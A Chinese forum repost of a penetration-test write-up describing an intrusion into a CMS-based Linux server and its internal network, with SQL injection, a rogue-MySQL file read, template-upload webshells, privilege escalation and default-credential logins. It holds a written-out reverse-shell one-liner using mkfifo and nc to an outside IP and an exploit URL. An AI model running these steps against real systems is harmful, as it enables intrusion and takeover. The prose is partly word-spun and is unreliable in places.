天涯论坛

 找回密码
 立即注册
搜索
查看: 15|回复: 2

记一次代码审计的Linux内网渗透

[复制链接]

2834

主题

316

回帖

9191万

积分

论坛元老

Rank: 8Rank: 8

积分
91919716
发表于 2024-10-3 18:28:12 | 显示全部楼层 |阅读模式
记一次代码审计的Linux内网渗透

1DMZWEB SERVER

InfomationGathering

看到重点是开了88821803306端口,888好似bt,看一下80:

便是咱们目的站,某cmsv1.0,下载下来审计一波瞧瞧

2PHPCMS Code Audit

分析流程发掘index.php->./loader/load.php->./loader/doc.php

先看load.php

注释比较清楚,便是按照url加载功能的引导页,再看doc.php

首要包括了比较重要的/inc/fuction.php而后对传入的参数做了cleanArrayForMysql()处理。往下看,比较重要的路由规则:

路由大概便是这般的,比较简单,然则最后一部分调用action之前有一个HTML_LOAD()

经过测试应该是进入了最后一个else而后,应该是开启了伪静态的原由

接下来看一下常用函数有问题:/inc/function.php

能够看到对基本sql注入的关键字进行了检测。

后台getshell:/admini/controllers/system/changeskin.php

上传模板,zip文件直接解压。

SQL注入:content\search\index.php

search功能,在进行urldecode()之前就进行了checkSqlStr()检测处理,因此呢达不到效果。

写个tamper脚本,进行两次url编码就行,用sqlmap:

跑出来以后不晓得这什么加密,看一下:/admin/login.php

跟进docEncryption:

看了下,getjxqy3()中后面三行问题都不大,但第1部分字符串截取是不可逆的。尝试能不可sql-shell去修改一下秘码

后面发掘数据库能够外连,尝试能不可搞到数据库账号秘码

3MySQLArbitrarily File Read

/setup/chkdb.php

先让它报错获取路径。

而后本地数据库开启外连来读文件。

读取文件的同期发掘爆路径了,不晓得是不是这个伪造的mysqlserver原由,以后没办法爆路径能够试一下(伪造mysqlserver默认账号秘码便是root123456)

http://www.xxx.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123456&dbhost=xxx.xxx.xxx.xxx&action=chkdb

更新一波秘码直接上后台。

4Bypass disable_functions

用刚才找到的上传模板getshell,本地有环境,直接把shell放进去本来的模板打包上传。发掘上传失败。

遂修改模板加上一句话不行,全部模板目录拜访发掘403不外不碍事,不需要直接拜访由于本来用的模板便是它,能够自动加载。能够执行代码,然则AntSword连不上。

菜刀成功连接,写入shellAntSword连接就可

估计有disablefunctions

5privilegeEscalation

看了下sudo版本,试一下。然则针对linux提权还是创立一个交互式shell比较方便。

rm/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc192.168.8.187 1456 >/tmp/f python3 -c import pty;pty.spawn("/bin/sh")

1SUID提权

好家伙,直接一波root

2bt提权

用户桌面发掘bt关联信息。

加上计划任务。

Intranet

两张网卡。

开个代理用nmap探测一下内网发掘144up的,再看下端口。

6emlog getshell

尝试一波弱口令,经过admin:123456进入后台

下载一个正常模板放一句话进去上传运用就可

7Privilege Escalation

常规试了下sudosuid提权,msfbind拿不到shell因此瞧瞧还有什么提权办法

发掘开了8080端口是个wdcp服务器,默认秘码登陆失败admin:wdlinux.cn然则mysql的默认秘码没改,还是上面那个。

www.target.com:8080/phpmyadmin

默认秘码登陆上去后能够看到:

找到管理员秘码md5解开后登陆上主面板就可

功能是真的全,还能改root秘码,直接提权就可

能够加个计划任务,收工~

8

关注公众号

关注本公众号 不定时更新文案和视频

欢迎前来关注





上一篇:视频剪辑软件下载premiere,Ae,达芬奇,Fncp
下一篇:电脑端 无损音乐下载软件 方格音乐 v1.6.1 绿色便携版
回复

使用道具 举报

3068

主题

3万

回帖

9915万

积分

论坛元老

Rank: 8Rank: 8

积分
99158939
发表于 2024-10-17 07:23:44 | 显示全部楼层
可以发布外链的网站 http://www.fok120.com/
回复

使用道具 举报

2992

主题

2万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99109210
发表于 2024-11-9 00:51:50 | 显示全部楼层
感谢您的精彩评论,为我带来了新的思考角度。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站点统计|Archiver|手机版|小黑屋|天涯论坛 ( 非经营性网站 )|网站地图

GMT+8, 2024-11-22 16:01 , Processed in 0.127297 second(s), 21 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.